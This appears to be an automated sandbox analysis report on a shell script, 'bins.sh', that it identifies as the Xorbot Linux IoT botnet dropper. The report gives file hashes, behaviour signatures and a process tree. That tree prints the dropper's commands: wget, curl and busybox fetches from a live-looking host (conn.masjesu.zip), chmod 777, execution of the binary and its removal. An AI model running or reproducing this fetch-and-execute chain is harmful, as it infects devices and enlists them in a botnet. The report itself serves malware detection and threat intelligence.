Overview

overview

10

Static

static

1

bins.sh

ubuntu-18.04-amd64

3

bins.sh

debian-9-armhf

4

bins.sh

debian-9-mips

10

bins.sh

debian-9-mipsel

10

Analysis

  • max time kernel
    33s
  • max time network
    103s
  • platform
    debian-9_mipsel
  • resource
    debian9-mipsel-20240226-en
  • resource tags

    arch:mipselimage:debian9-mipsel-20240226-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
  • submitted
    01-12-2024 13:45

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    bins.sh

  • Size

    10KB

  • MD5

    b7efdb6411845379ea3e0068e4024978

  • SHA1

    84d6dc35c3a3bf37878895192e863bad21231e36

  • SHA256

    641bfa6fb04b615de3424c5c914833a0928fd5c9df883aec915c102ad85b48bc

  • SHA512

    7a70881e139c4e468f8272002cd1c78fc03f50b7becd58a08ca44c692be4b6ec853046780c0a07ba4bdc1f7fc7affce4f4d186c5f3aafe553db2bb639bbd14b1

  • SSDEEP

    192:9FOQlBXQhxBh0fjsbXzCtFYTHAw0XzCtFwTHhkOQlBsnBh0fj6:9FOQlpQhxBh0fjsbXzCtFYTHAw0XzCtg

Score
10/10
xorbotbotnetdefense_evasiondiscoverytrojan

Malware Config

Signatures

  • Detects Xorbot 1 IoCs
    botnettrojan
  • Xorbot

    Xorbot is a linux botnet and trojan targeting IoT devices.

    botnettrojanxorbot
  • Xorbot family
    xorbot
  • File and Directory Permissions Modification 1 TTPs 1 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

    defense_evasion
  • Executes dropped EXE 1 IoCs
  • Reads runtime system information 1 IoCs

    Reads data from /proc virtual filesystem.

    discovery
  • System Network Configuration Discovery 1 TTPs 4 IoCs

    Adversaries may gather information about the network configuration of a system.

    discovery
  • Writes file to tmp directory 3 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/bins.sh
    /tmp/bins.sh
    1⤵
      PID:707
      • /bin/rm
        /bin/rm bins.sh
        2⤵
          PID:711
        • /usr/bin/wget
          wget http://conn.masjesu.zip/bins/hJRzjTzCTyN1B5vyD91ZEEM6tNEPRgdMqH
          2⤵
          • System Network Configuration Discovery
          • Writes file to tmp directory
          PID:717
        • /usr/bin/curl
          curl -O http://conn.masjesu.zip/bins/hJRzjTzCTyN1B5vyD91ZEEM6tNEPRgdMqH
          2⤵
          • Reads runtime system information
          • System Network Configuration Discovery
          • Writes file to tmp directory
          PID:781
        • /bin/busybox
          /bin/busybox wget http://conn.masjesu.zip/bins/hJRzjTzCTyN1B5vyD91ZEEM6tNEPRgdMqH
          2⤵
          • System Network Configuration Discovery
          • Writes file to tmp directory
          PID:783
        • /bin/chmod
          chmod 777 hJRzjTzCTyN1B5vyD91ZEEM6tNEPRgdMqH
          2⤵
          • File and Directory Permissions Modification
          PID:817
        • /tmp/hJRzjTzCTyN1B5vyD91ZEEM6tNEPRgdMqH
          ./hJRzjTzCTyN1B5vyD91ZEEM6tNEPRgdMqH
          2⤵
          • Executes dropped EXE
          PID:818
        • /bin/rm
          rm hJRzjTzCTyN1B5vyD91ZEEM6tNEPRgdMqH
          2⤵
            PID:820
          • /usr/bin/wget
            wget http://conn.masjesu.zip/bins/KQD7mDitUK61nXEGikFgNGJGuNxxeAoxJ2
            2⤵
            • System Network Configuration Discovery
            PID:821

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • /tmp/hJRzjTzCTyN1B5vyD91ZEEM6tNEPRgdMqH
          Filesize

          107KB

          MD5

          eb9c3a0de91fcf16ba17cb24608df68c

          SHA1

          09d95a7d70d5e115d103be51edff7c498d272fac

          SHA256

          dd01a1365a9f35501e09e0144ed1d4d8b00dcf20aa66cf6dc186e94d7dbe4b47

          SHA512

          9e1f3f88f82bb41c68d78b351c8dc8075522d6d42063f798b6ef38a491df7a3bab2c312d536fb0a6333e516d7dc4f5a58b80beb69422a04d1dbc61eaba346e27

          Download Submit